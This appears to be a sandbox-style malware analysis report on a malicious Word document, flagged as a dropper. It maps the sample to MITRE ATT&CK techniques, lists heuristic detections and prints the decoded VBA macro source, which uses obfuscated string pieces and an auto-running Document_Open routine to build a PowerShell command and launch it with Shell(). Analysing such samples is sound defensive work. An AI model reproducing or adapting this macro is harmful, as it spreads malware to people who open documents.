MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro triggers a call to a function that constructs and executes a shell command. This command is likely intended to download and execute a second-stage payload, as indicated by the ClamAV detection name 'Doc.Dropper.Agent-6852152-0'. The use of the Shell() function and the auto-execution of the macro strongly suggest a dropper or downloader functionality.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6852152-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6852152-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1950 bytes |
SHA-256: 2f9cb5334a2202a2a995f3a06dd3b20ef094be75dec14b0814d1d360d5b503e8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Call w("er")
End Sub
Attribute VB_Name = "JT2x0bNu"
Sub w(ruw1tx4y)
Dim mG8Nt(10 To 121) As String
mG8Nt(10) = "QVr03P6h"
Dim oupih As Long
oupih = (12288 / 1536) + (28)
Dim TOLxgdl
TOLxgdl = j1hW57mD4
Dim x8CNeM(7 To 92) As String
x8CNeM(7) = "HzQrZdhH0"
r1dac = "SHE" & "LL "
ygRNIuAdo = "ow"
NWG80q = ruw1tx4y
Dim t2Isgp As Long
t2Isgp = (384 - 363) / (22)
zKRdM sYkPMlG() & ygRNIuAdo & NWG80q & r1dac & yLmS2o3G
Dim KcApJbP As Long
KcApJbP = (626 - 595) * (23)
Dim DuLdP(11 To 51) As Long
DuLdP(11) = 15141 / 103
End Sub
Attribute VB_Name = "RVvRAQe"
Public Function sYkPMlG() As String
Dim ocRAqIuLg(8 To 43) As Long
ocRAqIuLg(8) = 312 - 94
Dim Uf4B5Ph As String
Uf4B5Ph = YYXu2WO
Dim VkbZQq59e(4 To 185) As Long
VkbZQq59e(4) = 22244 / 134
Dim h6HKLC8
h6HKLC8 = kw59QjS
sYkPMlG = "p"
End Function
Function zKRdM(I2AyFSCE1)
zKRdM = Shell(I2AyFSCE1, False)
End Function
Attribute VB_Name = "z2ztwniJ"
Public Function yLmS2o3G()
Dim X4eHgxGY
X4eHgxGY = BtzoM
Dim Twg1DJ As Object
Set Twg1DJ = New f
Dim FX3aDN7 As Long
FX3aDN7 = (-8753 + 8755) / (5)
Dim sEeMvsn(14 To 119) As String
sEeMvsn(14) = "RbpyZlUhm"
Dim H2v8Q93 As String
Dim mZK63h4df As Long
mZK63h4df = (28913 / 997) - (29)
H2v8Q93 = Twg1DJ.de.Text
yLmS2o3G = H2v8Q93
End Function
Attribute VB_Name = "f"
Attribute VB_Base = "0{A202624F-43DB-4B3D-A28F-BF7D9DA50FC8}{D0AAFBD5-A020-43C7-A35E-3757D62CC4CF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.